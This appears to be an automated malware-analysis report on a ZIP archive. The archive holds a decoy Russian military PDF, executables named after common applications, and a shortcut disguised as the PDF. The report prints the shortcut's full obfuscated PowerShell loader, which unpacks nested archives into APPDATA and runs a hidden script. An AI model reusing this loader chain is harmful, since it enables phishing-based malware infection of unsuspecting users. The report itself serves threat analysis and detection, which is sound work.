Malicious
Malicious
Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
b29aeac7d4ecec44635fc7de79e0b77d
Sha1
4366d516efc70dccfc954def33a25100e507479f
Sha256
fce33b1a8006abe1863eaeb2799a1ef81fcfca9fedbdae45d27f92eae68d0464
Sha384
274def116787de80726a983e2e33896e72e91a2747f73c1e25f73abeb99b5a380f7f7e4d8cf98ee6817c3469e29d9966
Sha512
58dd14c953d0b66300eff4621110e2ab12a409b72e87a982a9aa17cd903e05a7e8718f04465b503c862eb9e9a3fb9c081847845abc0aa676b83b8d61194e1443
SSDeep
196608:OaBDaA1k4/Up5yokLJpuaXqQ2xwjPGJeHIfPdCTo8NOntVwZlxAzzqNTGGXOPjJy:+58ACZCyoIOntVGgz+NTERajz
TLSH
B5C633D4B97096F43B926B612BC359FCBAA046363DC8550BCD627300C13B6DAEBE7409
File Structure
b29aeac7d4ecec44635fc7de79e0b77d
Malicious
$RECYCLE.BIN
activeProjectWidth
invoiceRatio
cssAction
adobephotoshop.exe
[Authenticode]_d068fa0a.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Komandovanie_v_strelkovyy_batalon.pdf
Text (Preview)
Page #1
#Stream {4}
#Stream {8}
#Stream {12}
#Stream {13}
Structure
initialConfigBound
ssh-shellhost.exe
[Authenticode]_a5d98da1.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
mainPlanMessage
itemName
invoiceRatio.pub
dataLimit
primaryRatingBound
ratingIndex
lastLicenseSet
totalCommentLabel.xml
libcrypto.dll
[Authenticode]_681ef6a5.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0002
ID:1033
vlcmediaplayer.exe
[Authenticode]_98ba5cdb.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
getLicenseCapacity.xml
documentList
temporaryCsvMode
googleslides.exe
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.buildid
.data
.pdata
.rodata
.tls
.reloc
ebay.exe
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
.xdata
.idata
.reloc
.symtab
cssDuration
Komandovanie_v_strelkovyy_batalon.‌‌​​‌pdf‍.lnk
Malicious
LNK CommandLine
Malicious
[Lnk Summary]
Malicious
Informations
Name
 Value
Komandovanie_v_strelkovyy_batalon.pdf

1.7
Komandovanie_v_strelkovyy_batalon.pdf

D:20260331062600-07'00'
Komandovanie_v_strelkovyy_batalon.pdf

Adobe Acrobat 22.1
Komandovanie_v_strelkovyy_batalon.pdf

D:20260331062629-07'00'
Komandovanie_v_strelkovyy_batalon.pdf

Adobe Acrobat 22.1 Image Conversion Plug-in
Komandovanie_v_strelkovyy_batalon.pdf

D:20260331062600-07'00'
Komandovanie_v_strelkovyy_batalon.pdf

Adobe Acrobat 22.1
Komandovanie_v_strelkovyy_batalon.pdf

D:20260331062629-07'00'
Komandovanie_v_strelkovyy_batalon.pdf

Adobe Acrobat 22.1 Image Conversion Plug-in
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe $permanentLicenseRate=([array](where.exe /R $env:userprofile 'Komandovanie_v_strelkovyy_batalon.zip'))[0].Trim(); &('Ex' + 'pand' + '-A' + 'rch' + 'ive') $permanentLicenseRate -D $env:APPDATA\customerRate; $permanentLicenseRate=$env:APPDATA+'\customerRate\$RECYCLE.BIN\activeProjectWidth'; $permanentValueAction=$permanentLicenseRate+'.zip'; ren $permanentLicenseRate -N $permanentValueAction; &('Ex' + 'pand' + '-A' + 'rch' + 'ive') $permanentValueAction -D $env:APPDATA\krita; Start-Process -WindowStyle Hidden ('pow' + 'er' + 'she' + 'll') (gc $env:APPDATA\krita\ratingIndex)
b29aeac7d4ecec44635fc7de79e0b77d (12.57 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙